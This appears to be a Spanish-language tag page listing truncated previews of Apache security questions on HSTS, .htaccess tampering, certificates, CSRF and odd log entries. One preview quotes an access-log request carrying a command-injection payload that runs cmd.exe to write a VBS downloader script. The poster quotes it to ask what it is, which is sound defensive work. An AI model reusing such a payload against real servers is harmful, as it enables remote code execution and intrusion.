Preguntas con etiqueta 'apache'

preguntas con etiqueta
1
respuesta

¿Está este encabezado HSTS configurado correctamente en LAMP?

Tengo un servidor LAMP y mi proveedor de certificados SSL me recomendó configurar el encabezado HSTS de la siguiente manera en Apache2: Header always set Strict-Transport-Security "max-age=63072000; includeSubdomains; preload" env=HTTPS Pre...
hecha 14.04.2016 - 03:48
1
respuesta

Solicitudes impares de los registros de Apache

He estado monitoreando alguna actividad extraña en los registros de acceso de mi sitio y he notado un par de intentos extraños en el servidor. Me pregunto si alguien ha visto esto antes. Es un servidor Apache 2.4.6. El primero que me llamó la...
hecha 15.01.2015 - 15:14
5
respuestas

¿Proteger contra ataques que modifiquen .htaccess?

Tengo un servidor dedicado. No hay código / sitio en vivo ahora, solo una página próximamente. Hace unos minutos me di cuenta de que alguien había cambiado el archivo .htaccess. ¿Cómo puedo protegerme contra ese tipo de ataque? El nuevo ht...
hecha 09.04.2013 - 21:30
2
respuestas

advertencias de SSL al usar el Certificado de Origen en mi VPS

Creé el Certificado de Origen en cloudflare e instalé en mi Apache en Debian VPS usando la guía enlace . Mi URL es así: enlace Recibo una advertencia "Hay problemas con la cadena de certificados del sitio (net :: ERR_CERT_AUTHORITY_INVA...
hecha 05.06.2016 - 10:45
2
respuestas

solicitud http sospechosa en los registros

Encontré esta solicitud en mi Ubuntu 14.04 apache2 access.log: xxx.228.207.244 - - [25/Sep/2014:17:52:03 -0400] "GET /?search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%...
hecha 26.09.2014 - 04:19
1
respuesta

¿Este fragmento de código htaccess proporciona suficiente seguridad?

He descargado una parte de .htaccess para evitar el uso de base64_encode o <script> o _REQUEST dentro de la URL. ¿Es esto lo suficientemente seguro para ayudarme en la seguridad parcial, o es solo una pérdida de...
hecha 29.12.2011 - 14:20
2
respuestas

Permitir que apache escriba en el directorio .ssh de los usuarios

Sé que el título es simplemente el cebo de "su configuración es insegura", pero permítame explicarlo. Estoy trabajando en una aplicación que tiene como objetivo permitir a los clientes sincronizar a través de SSH a nuestro servidor. Necesitam...
hecha 10.04.2012 - 22:49
2
respuestas

¿Protección CSRF en el lado del servidor?

Soy consciente de que es mejor mantener mi aplicación web parcheada y protegida contra ese tipo de ataques, pero en mi caso esto es algo más experimental. ¿Hay algo útil, como un módulo que pueda usarse para apache (2.4.7) para "proteger" con...
hecha 02.01.2017 - 11:35
2
respuestas

Escribir archivos en una subcarpeta de la carpeta web (seguridad de apache)

Necesito guardar los datos de la sesión para un script de página web dinámico escribiendo en el archivo. Tengo dos preguntas: ¿Hay alguna preferencia de seguridad en cuanto a si guardar los datos BAJO la carpeta web, o FUERA de la carpe...
hecha 30.03.2012 - 02:33
1
respuesta

Preocupación de los registros de acceso httpd [duplicado]

luego de configurar un nuevo servidor con solo ssh (solo clave pública) y un servidor web que solo sirve un index.html que dejé para el fin de semana. Al iniciar sesión el lunes, veo este tipo de cosas en mis httpd access_logs 5.199.170.44 -...
hecha 07.04.2015 - 18:16